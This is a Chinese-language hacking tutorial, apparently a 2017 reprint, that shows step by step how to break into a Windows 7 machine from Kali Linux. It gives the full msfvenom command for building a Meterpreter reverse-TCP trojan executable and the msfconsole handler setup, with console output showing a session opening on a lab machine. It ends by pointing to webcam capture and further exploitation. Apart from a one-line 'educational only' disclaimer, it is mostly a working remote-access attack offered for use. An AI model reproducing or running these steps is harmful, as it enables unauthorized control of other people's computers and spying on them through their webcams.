662
人物
如何使用 Kali Linux 黑掉 Windows
Kali Linux 派生自 Debian Linux,主要用於滲透測試,擁有超過 300 個的預安裝好的滲透測試工具。Metasploit 項目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一個用於開發和執行安全利用代碼security exploit的工具。讓我們來使用 Kali Linux 來攻破 Windows 吧。請注意,我寫這篇文章隻是出於教育目的哦——一切因此帶來的後果和本文作者、譯者無關。
源機器詳情
Kali Linux
root@kali:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:/#
用做攻擊對象的目標機器:
Windows 7 Ultimate SP1
步驟 1:創建 Payload 程序
Payload 是一個類似於病毒或者木馬的程序,可以運行在遠程目標上 —— 為了黑掉那台機器。可以通過以下命令來創建 Payload(program.exe
),以便能使用 Kali Linux 黑掉 Windows。
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root@kali:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
通過 ls
命令,我們可以確認 Payload 程序是否成功生成在指定的位置。
步驟 2:運行 mfsconsole
命令啟動 msf 命令窗口
root@kali:# msfconsole
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on https://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: https://r-7.co/trymsp ]
msf >
步驟 3:進行漏洞利用的細節
- 4444 端口:你可以按照自己的想法來選擇使用哪個端口
- LHOST IP:表示 Kali Linux 機器的 IP,這裏是 192.168.189.128。 使用如下命令來查看你的 Kali Linux 機器的 IP。
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
現在在 msf 命令窗口使用 use exploit/multi/handler
命令,如下:
msf > use exploit/multi/handler
msf exploit(handler) >
然後在接下來的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp
:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
現在使用 LHOST 和 LPORT 來設置本地 IP 和本地端口,如下:
msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444
最後使用 exploit
命令。
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
現在你需要在 Windows 上運行 program.exe
,一旦它在目標機器上執行,你就可以建立一個 meterpreter 會話。輸入 sysinfo
就可以得到這台被黑掉的 Windows 機器的詳情。
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
meterpreter > sysinfo
Computer : MANN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_IN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
一旦你得到了這些詳細信息,就可以做更多的漏洞利用,或者通過 help
命令獲取更多信息,以便列出你可以黑掉該係統的所有選項,比如 webcam_snap
命令獲取網絡攝像頭,同樣你還可以使用其他更多的可用選項。祝你入侵愉快!!!! ←_←
原文發布時間為:2017-02-11
本文來自雲棲社區合作夥伴“Linux中國”
最後更新:2017-05-26 09:02:08